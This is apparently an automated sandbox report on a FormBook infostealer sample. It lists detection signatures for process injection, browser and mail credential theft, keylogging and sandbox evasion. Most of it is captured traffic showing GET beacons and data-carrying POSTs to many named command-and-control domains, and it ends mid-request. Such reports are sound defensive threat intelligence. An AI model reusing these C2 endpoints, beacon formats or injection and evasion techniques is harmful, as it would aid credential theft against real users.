Analysis Report AT113020.exe

Overview

General Information

Sample Name:	AT113020.exe
Analysis ID:	326334
MD5:	8477c9b80b4b7796f904ec72abe8ff71
SHA1:	edf1c7daed8b5922f727170d9bd51bb00fae2538
SHA256:	772dec92f8ad84f499fbaf384a618c5208e1d5882d753f99aeb396059ffb4f1c
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

Creates autostart registry keys with suspicious names

Creates multiple autostart registry keys

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Signatures

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: AT113020.exe

ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.Accfdrv.exe.27f0000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 1.2.AT113020.exe.2ad0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.AT113020.exe.27d0000.4.unpack	Avira: Label: TR/Hijacker.Gen
Source: 5.2.Accfdrv.exe.2af0000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.Accfdrv.exe.4ac0000.6.unpack	Avira: Label: TR/Hijacker.Gen
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.ieinstal.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

5_2_00405DBC

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 4x nop then mov edx, esp		1_2_0048ACB4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 4x nop then mov edx, esp		5_2_0048ACB4

Networking:

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_040FE488 InternetCheckConnectionA,

5_2_040FE488

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.makingdoathome.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.makingdoathome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.makingdoathome.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4d 59 68 34 39 6a 61 39 6f 38 63 76 6d 39 62 6d 4f 6d 4d 36 76 64 6e 56 50 4d 63 71 64 37 6c 35 31 72 76 6b 59 73 7a 49 33 57 6d 6d 53 7a 4f 50 28 41 4e 71 68 33 6b 36 6d 33 54 5a 4c 52 5a 41 5a 4b 51 37 52 4d 6a 6a 38 78 54 6d 37 79 70 51 28 69 74 49 78 63 58 37 46 56 76 59 38 38 66 6f 37 6d 36 6a 53 61 68 36 51 51 4c 64 33 4c 4a 5f 4f 73 75 32 44 56 56 44 46 37 6a 57 6a 30 6d 38 51 74 59 6b 36 44 6e 65 6e 35 6c 76 28 41 70 79 59 79 4e 64 69 74 56 68 42 61 48 61 70 6a 52 43 58 59 53 49 7e 45 44 61 4b 6b 57 75 37 35 4f 71 47 6e 50 35 28 4d 46 41 30 31 4e 36 50 69 44 52 61 30 48 72 48 6a 43 39 6f 33 4b 58 4f 65 7e 7a 6b 70 45 74 64 30 33 48 68 68 4b 6b 69 65 6a 4b 37 66 7e 61 4d 